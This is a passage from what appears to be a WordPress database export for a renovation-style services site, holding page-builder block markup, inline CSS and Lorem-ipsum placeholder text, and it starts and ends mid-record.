}\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0a850fcc-c7cf-45d0-b803-6269cf9549f0\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"5b454c6b-b036-4df1-b709-faa4cc3e5182\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-5b454c6b-b036-4df1-b709-faa4cc3e5182 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a01244d7-d93e-48ac-8738-370d1cf8f3f4\"} -->\n<style type=\"text/css\"> .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"8e4ba042-e26a-42f8-8c9c-3ac59848f67f\"} -->\n<style type=\"text/css\"> .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','inherit','closed','closed','','229-revision-v1','','','2022-08-23 18:09:34','2022-08-23 18:09:34','',229,'https://cteisys.com/?p=428',0,'revision','',0),(345,1,'2021-05-27 10:53:22','2021-05-27 10:53:22','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"099538db-2da2-4aaf-af99-326419f9d4ff\"} -->\n<style type=\"text/css\"> .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-099538db-2da2-4aaf-af99-326419f9d4ff skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"0c23ecb8-5eaa-4515-8b13-6026ea39bcce\"} -->\n<style type=\"text/css\"> .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"0c855a8d-570f-4882-a246-257e7147b2d0\"} -->\n<style type=\"text/css\"> .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0c855a8d-570f-4882-a246-257e7147b2d0\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"d5a2705f-d0d5-4315-8283-66b54cdaf2c1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. 